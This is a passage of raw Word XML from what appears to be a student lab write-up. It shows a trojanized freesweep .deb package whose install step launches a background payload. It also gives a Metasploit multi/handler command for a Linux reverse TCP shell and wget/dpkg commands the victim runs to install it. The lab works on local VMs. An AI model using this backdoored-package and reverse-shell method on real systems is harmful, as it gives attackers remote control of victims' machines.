          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D40AF91" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359C3CA5" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2755 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>/games/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>freesweep_scores</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>/games/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>freesweep_scores</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>/games/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t>freesweep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C8A99" w14:textId="77777777" w:rsidR="00BD5532" w:rsidRPr="00E42CF6" w:rsidRDefault="00BD5532"/>
    <w:p w14:paraId="19EACA44" w14:textId="3E248122" w:rsidR="00646AB3" w:rsidRDefault="003E4C2F">
      <w:r>
        <w:t xml:space="preserve">run the following command in kali to start listening for payload installation in victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maching</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600086AC" w14:textId="268DAEC3" w:rsidR="003E4C2F" w:rsidRDefault="003E4C2F" w:rsidP="003E4C2F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t xml:space="preserve"> -q -x "use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>handler;set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t xml:space="preserve"> PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>/x86/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E4C2F">
        <w:t>; set LHOST 10.0.2.5; set LPORT 443; run; exit -y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB8C8D" w14:textId="247648D5" w:rsidR="00106D19" w:rsidRDefault="00106D19"/>
    <w:p w14:paraId="6242FDF2" w14:textId="77777777" w:rsidR="00D51DEF" w:rsidRDefault="00D51DEF"/>
    <w:p w14:paraId="7AB22554" w14:textId="666FD2AF" w:rsidR="00954A37" w:rsidRDefault="00954A37" w:rsidP="00954A37">
      <w:r w:rsidRPr="00B54E98">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Installing the payload by victim</w:t>
      </w:r>
      <w:r w:rsidR="00B54E98">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E022BEC" w14:textId="59D42ECA" w:rsidR="00954A37" w:rsidRDefault="00954A37">
      <w:r>
        <w:t>In the ubuntu machine type the following commands</w:t>
      </w:r>
      <w:r w:rsidR="00211BA8">
        <w:t xml:space="preserve"> to download and install the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F4DAA" w14:textId="64710F0E" w:rsidR="001723C0" w:rsidRDefault="001723C0" w:rsidP="001723C0">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001723C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001723C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F14CE5" w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="00F14CE5" w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>10.0.2.6</w:t>
      </w:r>
      <w:r w:rsidR="00F14CE5" w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>/freesweep.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC5221" w14:textId="450ABD98" w:rsidR="00F14CE5" w:rsidRPr="00F14CE5" w:rsidRDefault="00F14CE5" w:rsidP="00F14CE5">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F14CE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>freesweep.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C13D393" w14:textId="605B6D44" w:rsidR="00211BA8" w:rsidRDefault="00211BA8"/>
    <w:p w14:paraId="2E7BBA19" w14:textId="22CBE833" w:rsidR="00F14CE5" w:rsidRDefault="00A75C0E">
      <w:r>
        <w:t>In the kali VM you can see a new command shell being created.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0397A4CD" w14:textId="58CE2B41" w:rsidR="00D0753B" w:rsidRDefault="00794503">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785E5432" wp14:editId="13255D2A">
            <wp:extent cx="11153775" cy="17770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7540" cy="179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77"/>
    <w:rsid w:val="00067914"/>
    <w:rsid w:val="00106D19"/>
    <w:rsid w:val="00133777"/>
    <w:rsid w:val="001723C0"/>
    <w:rsid w:val="0017724B"/>
    <w:rsid w:val="00184625"/>
    <w:rsid w:val="00211BA8"/>
    <w:rsid w:val="00236490"/>
    <w:rsid w:val="00281631"/>
    <w:rsid w:val="002A5857"/>
    <w:rsid w:val="002D7E09"/>
    <w:rsid w:val="0035003D"/>
    <w:rsid w:val="00354FBF"/>
    <w:rsid w:val="003558E6"/>
    <w:rsid w:val="003C5F66"/>
    <w:rsid w:val="003D7E8D"/>
    <w:rsid w:val="003E4C2F"/>
    <w:rsid w:val="00427309"/>
    <w:rsid w:val="00444070"/>
    <w:rsid w:val="00497BDE"/>
    <w:rsid w:val="004A6DCD"/>
    <w:rsid w:val="004B32A1"/>
    <w:rsid w:val="005B6241"/>
    <w:rsid w:val="005C2C81"/>
    <w:rsid w:val="00613C44"/>
    <w:rsid w:val="00625A95"/>
    <w:rsid w:val="00646AB3"/>
    <w:rsid w:val="006507F9"/>
    <w:rsid w:val="00655DEC"/>
    <w:rsid w:val="00702206"/>
    <w:rsid w:val="00794503"/>
    <w:rsid w:val="00817381"/>
    <w:rsid w:val="008D0F6B"/>
    <w:rsid w:val="008E5F4E"/>
    <w:rsid w:val="008E6E36"/>
    <w:rsid w:val="008F3989"/>
    <w:rsid w:val="008F7261"/>
    <w:rsid w:val="0090311C"/>
    <w:rsid w:val="00954A37"/>
    <w:rsid w:val="00974DA9"/>
    <w:rsid w:val="00983C17"/>
    <w:rsid w:val="009C0D89"/>
    <w:rsid w:val="00A2538C"/>
    <w:rsid w:val="00A75C0E"/>
    <w:rsid w:val="00A75D44"/>
    <w:rsid w:val="00B54E98"/>
    <w:rsid w:val="00B71187"/>
    <w:rsid w:val="00BD5532"/>
    <w:rsid w:val="00BF51E2"/>
    <w:rsid w:val="00CA6461"/>
    <w:rsid w:val="00CA7073"/>
    <w:rsid w:val="00CB58F4"/>
    <w:rsid w:val="00D05CEF"/>
    <w:rsid w:val="00D0753B"/>
    <w:rsid w:val="00D51DEF"/>
    <w:rsid w:val="00D736D7"/>
    <w:rsid w:val="00DE476A"/>
    <w:rsid w:val="00E03B9E"/>
    <w:rsid w:val="00E069C9"/>
    <w:rsid w:val="00E25CBE"/>
    <w:rsid w:val="00E42CF6"/>
    <w:rsid w:val="00EF123F"/>
    <w:rsid w:val="00EF5D03"/>
    <w:rsid w:val="00EF668E"/>
    <w:rsid w:val="00F14CE5"/>
    <w:rsid w:val="00F6760D"/>
    <w:rsid w:val="00F76CE6"/>
    <w:rsid w:val="00F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8A3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB88ADC1-6577-44E5-B4DE-49CF05FB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2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offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wikihow.com/Install-Ubuntu-on-Virtua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Ayinala, Kaushik (UMKC-Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ayinala, Kaushik (UMKC-Student)</cp:lastModifiedBy>
  <cp:revision>59</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-03T23:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-08T04:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>